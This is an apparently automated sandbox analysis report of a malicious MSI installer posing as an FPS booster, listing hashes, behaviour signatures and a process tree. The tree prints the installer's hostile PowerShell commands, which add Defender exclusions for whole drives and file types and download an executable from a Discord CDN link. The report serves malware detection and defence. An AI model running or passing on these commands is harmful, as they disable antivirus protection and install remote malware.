0c93ad2770b6428e558ee08382ffb14d8faccad8932c9abb119b76badf08cba6

Analysis

max time kernel
48s
max time network
30s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
31/12/2022, 15:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Fast_FPS_by_Untie.msi
Size

408KB
MD5

b3fdf1a56d2b3a15b9b6cced090e2bbd
SHA1

401d9a223d082b02c529db39c723d6cc00caabf0
SHA256

0c93ad2770b6428e558ee08382ffb14d8faccad8932c9abb119b76badf08cba6
SHA512

45b452f25e58d233e139c8bdc6fb35c22fe0fe1da3ec2918c11342d49fa4d383267ab83adabf5c0612572fc5dcec74c5205573cfd31b3df90489cc341f2f68ef
SSDEEP

6144:uqtOIiRQYpgjpjew5LLyGx1qo8nyKx45qVv0ja+N5xBnYb0Y:uqtMRQ+gjpjegLyo8FsqV8jGbP

Score

7^/10

discovery

Malware Config

Signatures

Loads dropped DLL 1 IoCs

pid	Process
812	MsiExec.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1356	ICACLS.EXE
1052	ICACLS.EXE

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\6c6b14.ipi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\6c6b13.msi	msiexec.exe
File created	C:\Windows\Installer\6c6b14.ipi	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Installer\6c6b13.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6D54.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	EXPAND.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1728	msiexec.exe
1728	msiexec.exe
1004	powershell.exe
1908	powershell.exe
780	powershell.exe
968	powershell.exe
1924	powershell.exe
912	powershell.exe
1676	powershell.exe
1704	powershell.exe
332	powershell.exe
1312	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1876	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1876	msiexec.exe
Token: SeRestorePrivilege	1728	msiexec.exe
Token: SeTakeOwnershipPrivilege	1728	msiexec.exe
Token: SeSecurityPrivilege	1728	msiexec.exe
Token: SeCreateTokenPrivilege	1876	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1876	msiexec.exe
Token: SeLockMemoryPrivilege	1876	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1876	msiexec.exe
Token: SeMachineAccountPrivilege	1876	msiexec.exe
Token: SeTcbPrivilege	1876	msiexec.exe
Token: SeSecurityPrivilege	1876	msiexec.exe
Token: SeTakeOwnershipPrivilege	1876	msiexec.exe
Token: SeLoadDriverPrivilege	1876	msiexec.exe
Token: SeSystemProfilePrivilege	1876	msiexec.exe
Token: SeSystemtimePrivilege	1876	msiexec.exe
Token: SeProfSingleProcessPrivilege	1876	msiexec.exe
Token: SeIncBasePriorityPrivilege	1876	msiexec.exe
Token: SeCreatePagefilePrivilege	1876	msiexec.exe
Token: SeCreatePermanentPrivilege	1876	msiexec.exe
Token: SeBackupPrivilege	1876	msiexec.exe
Token: SeRestorePrivilege	1876	msiexec.exe
Token: SeShutdownPrivilege	1876	msiexec.exe
Token: SeDebugPrivilege	1876	msiexec.exe
Token: SeAuditPrivilege	1876	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1876	msiexec.exe
Token: SeChangeNotifyPrivilege	1876	msiexec.exe
Token: SeRemoteShutdownPrivilege	1876	msiexec.exe
Token: SeUndockPrivilege	1876	msiexec.exe
Token: SeSyncAgentPrivilege	1876	msiexec.exe
Token: SeEnableDelegationPrivilege	1876	msiexec.exe
Token: SeManageVolumePrivilege	1876	msiexec.exe
Token: SeImpersonatePrivilege	1876	msiexec.exe
Token: SeCreateGlobalPrivilege	1876	msiexec.exe
Token: SeBackupPrivilege	752	vssvc.exe
Token: SeRestorePrivilege	752	vssvc.exe
Token: SeAuditPrivilege	752	vssvc.exe
Token: SeBackupPrivilege	1728	msiexec.exe
Token: SeRestorePrivilege	1728	msiexec.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	928	DrvInst.exe
Token: SeLoadDriverPrivilege	928	DrvInst.exe
Token: SeLoadDriverPrivilege	928	DrvInst.exe
Token: SeLoadDriverPrivilege	928	DrvInst.exe
Token: SeRestorePrivilege	1728	msiexec.exe
Token: SeTakeOwnershipPrivilege	1728	msiexec.exe
Token: SeRestorePrivilege	1728	msiexec.exe
Token: SeTakeOwnershipPrivilege	1728	msiexec.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: 33	1432	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1876	msiexec.exe
1876	msiexec.exe
1876	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 1728 wrote to memory of 812	1728	msiexec.exe	32
PID 812 wrote to memory of 1356	812	MsiExec.exe	33
PID 812 wrote to memory of 1356	812	MsiExec.exe	33
PID 812 wrote to memory of 1356	812	MsiExec.exe	33
PID 812 wrote to memory of 1356	812	MsiExec.exe	33
PID 812 wrote to memory of 1964	812	MsiExec.exe	35
PID 812 wrote to memory of 1964	812	MsiExec.exe	35
PID 812 wrote to memory of 1964	812	MsiExec.exe	35
PID 812 wrote to memory of 1964	812	MsiExec.exe	35
PID 812 wrote to memory of 2004	812	MsiExec.exe	37
PID 812 wrote to memory of 2004	812	MsiExec.exe	37
PID 812 wrote to memory of 2004	812	MsiExec.exe	37
PID 812 wrote to memory of 2004	812	MsiExec.exe	37
PID 2004 wrote to memory of 756	2004	cmd.exe	39
PID 2004 wrote to memory of 756	2004	cmd.exe	39
PID 2004 wrote to memory of 756	2004	cmd.exe	39
PID 2004 wrote to memory of 756	2004	cmd.exe	39
PID 756 wrote to memory of 1600	756	net.exe	40
PID 756 wrote to memory of 1600	756	net.exe	40
PID 756 wrote to memory of 1600	756	net.exe	40
PID 756 wrote to memory of 1600	756	net.exe	40
PID 2004 wrote to memory of 1924	2004	cmd.exe	41
PID 2004 wrote to memory of 1924	2004	cmd.exe	41
PID 2004 wrote to memory of 1924	2004	cmd.exe	41
PID 2004 wrote to memory of 1924	2004	cmd.exe	41
PID 2004 wrote to memory of 1908	2004	cmd.exe	43
PID 2004 wrote to memory of 1908	2004	cmd.exe	43
PID 2004 wrote to memory of 1908	2004	cmd.exe	43
PID 2004 wrote to memory of 1908	2004	cmd.exe	43
PID 2004 wrote to memory of 780	2004	cmd.exe	42
PID 2004 wrote to memory of 780	2004	cmd.exe	42
PID 2004 wrote to memory of 780	2004	cmd.exe	42
PID 2004 wrote to memory of 780	2004	cmd.exe	42
PID 2004 wrote to memory of 912	2004	cmd.exe	44
PID 2004 wrote to memory of 912	2004	cmd.exe	44
PID 2004 wrote to memory of 912	2004	cmd.exe	44
PID 2004 wrote to memory of 912	2004	cmd.exe	44
PID 2004 wrote to memory of 1004	2004	cmd.exe	45
PID 2004 wrote to memory of 1004	2004	cmd.exe	45
PID 2004 wrote to memory of 1004	2004	cmd.exe	45
PID 2004 wrote to memory of 1004	2004	cmd.exe	45
PID 2004 wrote to memory of 968	2004	cmd.exe	46
PID 2004 wrote to memory of 968	2004	cmd.exe	46
PID 2004 wrote to memory of 968	2004	cmd.exe	46
PID 2004 wrote to memory of 968	2004	cmd.exe	46
PID 2004 wrote to memory of 1676	2004	cmd.exe	47
PID 2004 wrote to memory of 1676	2004	cmd.exe	47
PID 2004 wrote to memory of 1676	2004	cmd.exe	47
PID 2004 wrote to memory of 1676	2004	cmd.exe	47
PID 2004 wrote to memory of 1704	2004	cmd.exe	48
PID 2004 wrote to memory of 1704	2004	cmd.exe	48
PID 2004 wrote to memory of 1704	2004	cmd.exe	48
PID 2004 wrote to memory of 1704	2004	cmd.exe	48
PID 2004 wrote to memory of 332	2004	cmd.exe	49
PID 2004 wrote to memory of 332	2004	cmd.exe	49
PID 2004 wrote to memory of 332	2004	cmd.exe	49
PID 2004 wrote to memory of 332	2004	cmd.exe	49
PID 2004 wrote to memory of 1312	2004	cmd.exe	50

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Fast_FPS_by_Untie.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1876

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8C85DF4EAD915EDC31CF208938F3DD17
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:1356
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:1964
- - C:\Windows\syswow64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files\UntiePerformance - Copy - Copy.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\SysWOW64\net.exe
      NET FILE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 FILE
        5⤵
        
        PID:1600
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy -Force -ExecutionPolicy Unrestricted
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath D:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath E:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionProcess Fast_FPS.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:968
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension tmp
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1676
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension bat
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/918358647397036053/973534551185973318/Fast_FPS.exe -OutFile C:\Fast_FPS.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\." /SETINTEGRITYLEVEL (CI)(OI)LOW
    3⤵
    - Modifies file permissions
    PID:1052

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003DC" "00000000000004A8"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1208

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1c0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files.cab

Filesize
863B

MD5
f6377a186da24de5c0579131d3e914d5

SHA1
94d57adb5e80447a7d0645096a20ae9e08f5d353

SHA256
8bc9db6e3bad52a0456afbb2f1d2e511a3a7daa6c5af23fdaa9afdcf077f7c5c

SHA512
2380ca7762174ee27e87a41c36c8e66c3660417b1dc3018206bf1ebb501f90351cdbcf690e02ed331dfe896d3cc11b424a88c951dd21247d98b5a2f48c269053

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files\UntiePerformance - Copy - Copy.bat

Filesize
2KB

MD5
8bbbd92335d2779351ffcbe279696df6

SHA1
cc15c9e1165d093f22f69221a7657e5e7585657b

SHA256
f2be711af6168320ac273a0fcc66b41526d0c04fd9e20e9f4de34ef065b1b50a

SHA512
f204e2bbc8c4c88322a1483b135c5198f39ba895c6b363dc81a3f2ffc3b10061d2d13dc7872e058dd2cc99a83b121a413148641174d57cbbcde25ae98cd5eace

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\msiwrapper.ini

Filesize
1KB

MD5
7b6266320d28a2f2e2066bbfc4c1cd3b

SHA1
7282f962c633626e62867b3522394f83fa15846d

SHA256
27aecc07ae3cb602dc4f64e41ddff441833980961bb4df46d60f1df6b8a6a269

SHA512
a6a0d9919c7e4c88087a331e8117ac440979f0aeb30ccf70c32390fedfbedd517029e03365428150ebaf95e9a40c04511bbe1c93678d4a460241e1d408c5d13b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fa974bf6f81628f16eba74808a9ce87c

SHA1
caf6f8005ab4ca9b92487cc218d581c3bbc14a1a

SHA256
3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2

SHA512
eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56

Download Submit
C:\Windows\Installer\MSI6D54.tmp

Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

